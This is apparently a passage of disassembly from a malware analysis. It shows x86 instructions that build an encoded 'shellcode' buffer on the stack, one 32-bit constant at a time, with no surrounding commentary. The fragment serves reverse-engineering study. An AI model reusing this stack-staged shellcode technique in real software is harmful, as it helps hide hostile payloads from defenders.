PANW:004506D0                 mov     [ebp+shellcode], 86023750h
PANW:004506DA                 mov     [ebp+var_2D8], 0AF64084Ch
PANW:004506E4                 mov     [ebp+var_2D4], 86021C20h
PANW:004506EE                 mov     [ebp+var_2D0], 0AF63F84Ch
PANW:004506F8                 mov     [ebp+var_2CC], 86022139h
PANW:00450702                 mov     [ebp+var_2C8], 0AF63FB4Ch
PANW:0045070C                 mov     [ebp+var_2C4], 86022D1Eh
PANW:00450716                 mov     [ebp+var_2C0], 0AF64024Ch
PANW:00450720                 mov     [ebp+var_2BC], 86024335h
PANW:0045072A                 mov     [ebp+var_2B8], 0AF640F4Ch
PANW:00450734                 mov     [ebp+var_2B4], 86021C20h
PANW:0045073E                 mov     [ebp+var_2B0], 0AF63F84Ch
PANW:00450748                 mov     [ebp+var_2AC], 86021C20h
PANW:00450752                 mov     [ebp+var_2A8], 0AF63F84Ch
PANW:0045075C                 mov     [ebp+var_2A4], 8601E926h
PANW:00450766                 mov     [ebp+var_2A0], 0AF63DA4Ch
PANW:00450770                 mov     [ebp+var_29C], 86023750h
PANW:0045077A                 mov     [ebp+var_298], 0AF64084Ch
PANW:00450784                 mov     [ebp+var_294], 86021C20h
PANW:0045078E                 mov     [ebp+var_290], 0AF63F84Ch
PANW:00450798                 mov     [ebp+var_28C], 86022139h
PANW:004507A2                 mov     [ebp+var_288], 0AF63FB4Ch
PANW:004507AC                 mov     [ebp+var_284], 86022D1Eh
PANW:004507B6                 mov     [ebp+var_280], 0AF64024Ch
PANW:004507C0                 mov     [ebp+var_27C], 86024335h
PANW:004507CA                 mov     [ebp+var_278], 0AF640F4Ch
PANW:004507D4                 mov     [ebp+var_274], 86021C20h
PANW:004507DE                 mov     [ebp+var_270], 0AF63F84Ch
PANW:004507E8                 mov     [ebp+var_26C], 86021C20h
PANW:004507F2                 mov     [ebp+var_268], 0AF63F84Ch
PANW:004507FC                 mov     [ebp+var_264], 8601E926h
PANW:00450806                 mov     [ebp+var_260], 0AF63DA4Ch
PANW:00450810                 mov     [ebp+var_25C], 86023750h
PANW:0045081A                 mov     [ebp+var_258], 0AF64084Ch
PANW:00450824                 mov     [ebp+var_254], 86021C20h
PANW:0045082E                 mov     [ebp+var_250], 0AF63F84Ch
PANW:00450838                 mov     [ebp+var_24C], 86022139h
PANW:00450842                 mov     [ebp+var_248], 0AF63FB4Ch
PANW:0045084C                 mov     [ebp+var_244], 86022D1Eh
PANW:00450856                 mov     [ebp+var_240], 0AF64024Ch
PANW:00450860                 mov     [ebp+var_23C], 86024335h
PANW:0045086A                 mov     [ebp+var_238], 0AF640F4Ch
PANW:00450874                 mov     [ebp+var_234], 86021C20h
PANW:0045087E                 mov     [ebp+var_230], 0AF63F84Ch
PANW:00450888                 mov     [ebp+var_22C], 86021C20h
PANW:00450892                 mov     [ebp+var_228], 0AF63F84Ch
PANW:0045089C                 mov     [ebp+var_224], 8601FBD7h
PANW:004508A6                 mov     [ebp+var_220], 0AF63E54Ch
PANW:004508B0                 mov     [ebp+var_21C], 86023084h
PANW:004508BA                 mov     [ebp+var_218], 0AF64044Ch
PANW:004508C4                 mov     [ebp+var_214], 86021C20h
PANW:004508CE                 mov     [ebp+var_210], 0AF63F84Ch
PANW:004508D8                 mov     [ebp+var_20C], 8602359Dh
PANW:004508E2                 mov     [ebp+var_208], 0AF64074Ch
PANW:004508EC                 mov     [ebp+var_204], 860222ECh
PANW:004508F6                 mov     [ebp+var_200], 0AF63FC4Ch
PANW:00450900                 mov     [ebp+var_1FC], 86023750h
PANW:0045090A                 mov     [ebp+var_1F8], 0AF64084Ch
PANW:00450914                 mov     [ebp+var_1F4], 86019CAFh
PANW:0045091E                 mov     [ebp+var_1F0], 0AF63AD4Ch
PANW:00450928                 mov     [ebp+var_1EC], 86023750h
PANW:00450932                 mov     [ebp+var_1E8], 0AF64084Ch
PANW:0045093C                 mov     [ebp+var_1E4], 8601A015h
PANW:00450946                 mov     [ebp+var_1E0], 0AF63AF4Ch
PANW:00450950                 mov     [ebp+var_1DC], 86022652h
PANW:0045095A                 mov     [ebp+var_1D8], 0AF63FE4Ch
PANW:00450964                 mov     [ebp+var_1D4], 86022ED1h
PANW:0045096E                 mov     [ebp+var_1D0], 0AF64034Ch
PANW:00450978                 mov     [ebp+var_1CC], 860222ECh
PANW:00450982                 mov     [ebp+var_1C8], 0AF63FC4Ch
PANW:0045098C                 mov     [ebp+var_1C4], 86023E1Ch
PANW:00450996                 mov     [ebp+var_1C0], 0AF640C4Ch
PANW:004509A0                 mov     [ebp+var_1BC], 86023E1Ch
PANW:004509AA                 mov     [ebp+var_1B8], 0AF640C4Ch
PANW:004509B4                 mov     [ebp+var_1B4], 86023750h
PANW:004509BE                 mov     [ebp+var_1B0], 0AF64084Ch
PANW:004509C8                 mov     [ebp+var_1AC], 86019430h
PANW:004509D2                 mov     [ebp+var_1A8], 0AF63A84Ch
PANW:004509DC                 mov     [ebp+var_1A4], 86021C20h
PANW:004509E6                 mov     [ebp+var_1A0], 0AF63F84Ch
PANW:004509F0                 mov     [ebp+var_19C], 86023E1Ch
PANW:004509FA                 mov     [ebp+var_198], 0AF640C4Ch
PANW:00450A04                 mov     [ebp+var_194], 86024182h
PANW:00450A0E                 mov     [ebp+var_190], 0AF640E4Ch
PANW:00450A18                 mov     [ebp+var_18C], 860222ECh
PANW:00450A22                 mov     [ebp+var_188], 0AF63FC4Ch
PANW:00450A2C                 mov     [ebp+var_184], 86021F86h
PANW:00450A36                 mov     [ebp+var_180], 0AF63FA4Ch
PANW:00450A40                 mov     [ebp+var_17C], 86023903h
PANW:00450A4A                 mov     [ebp+var_178], 0AF64094Ch
PANW:00450A54                 mov     [ebp+var_174], 8601F50Bh
PANW:00450A5E                 mov     [ebp+var_170], 0AF63E14Ch
PANW:00450A68                 mov     [ebp+var_16C], 86024BB4h
PANW:00450A72                 mov     [ebp+var_168], 0AF64144Ch
PANW:00450A7C                 mov     [ebp+var_164], 8601A015h
PANW:00450A86                 mov     [ebp+var_160], 0AF63AF4Ch
PANW:00450A90                 mov     [ebp+var_15C], 86022652h
PANW:00450A9A                 mov     [ebp+var_158], 0AF63FE4Ch
PANW:00450AA4                 mov     [ebp+var_154], 86022ED1h
PANW:00450AAE                 mov     [ebp+var_150], 0AF64034Ch
PANW:00450AB8                 mov     [ebp+var_14C], 860222ECh
PANW:00450AC2                 mov     [ebp+var_148], 0AF63FC4Ch
PANW:00450ACC                 mov     [ebp+var_144], 86023E1Ch
PANW:00450AD6                 mov     [ebp+var_140], 0AF640C4Ch
PANW:00450AE0                 mov     [ebp+var_13C], 86023E1Ch
PANW:00450AEA                 mov     [ebp+var_138], 0AF640C4Ch
PANW:00450AF4                 mov     [ebp+var_134], 86023750h
PANW:00450AFE                 mov     [ebp+var_130], 0AF64084Ch
PANW:00450B08                 mov     [ebp+var_12C], 86019430h
PANW:00450B12                 mov     [ebp+var_128], 0AF63A84Ch
PANW:00450B1C                 mov     [ebp+var_124], 86021C20h
PANW:00450B26                 mov     [ebp+var_120], 0AF63F84Ch
PANW:00450B30                 mov     [ebp+var_11C], 86023E1Ch
PANW:00450B3A                 mov     [ebp+var_118], 0AF640C4Ch
PANW:00450B44                 mov     [ebp+var_114], 86024182h
PANW:00450B4E                 mov     [ebp+var_110], 0AF640E4Ch
PANW:00450B58                 mov     [ebp+var_10C], 860222ECh
PANW:00450B62                 mov     [ebp+var_108], 0AF63FC4Ch
PANW:00450B6C                 mov     [ebp+var_104], 86024BB4h
PANW:00450B76                 mov     [ebp+var_100], 0AF64144Ch
PANW:00450B80                 mov     [ebp+var_FC], 86023903h
PANW:00450B8E                 mov     [ebp+var_F8], 0AF64094Ch
PANW:00450B98                 mov     [ebp+var_F4], 86019AFCh
PANW:00450BA2                 mov     [ebp+var_F0], 0AF63AC4Ch
PANW:00450BAC                 mov     [ebp+var_EC], 86023084h
PANW:00450BB6                 mov     [ebp+var_E8], 0AF64044Ch
PANW:00450BC0                 mov     [ebp+var_E4], 8601E926h
PANW:00450BCA                 mov     [ebp+var_E0], 0AF63DA4Ch
PANW:00450BD4                 mov     [ebp+var_DC], 86023750h
PANW:00450BDE                 mov     [ebp+var_D8], 0AF64084Ch
PANW:00450BE8                 mov     [ebp+var_D4], 86021C20h
PANW:00450BF2                 mov     [ebp+var_D0], 0AF63F84Ch
PANW:00450BFC                 mov     [ebp+var_CC], 86022139h
PANW:00450C06                 mov     [ebp+var_C8], 0AF63FB4Ch
PANW:00450C10                 mov     [ebp+var_C4], 86022D1Eh
PANW:00450C1A                 mov     [ebp+var_C0], 0AF64024Ch
PANW:00450C24                 mov     [ebp+var_BC], 86024335h
PANW:00450C2E                 mov     [ebp+var_B8], 0AF640F4Ch
PANW:00450C38                 mov     [ebp+var_B4], 86021C20h
PANW:00450C42                 mov     [ebp+var_B0], 0AF63F84Ch
PANW:00450C4C                 mov     [ebp+var_AC], 86021C20h
PANW:00450C56                 mov     [ebp+var_A8], 0AF63F84Ch
PANW:00450C60                 mov     [ebp+var_A4], 8601A1C8h
PANW:00450C6A                 mov     [ebp+var_A0], 0AF63B04Ch
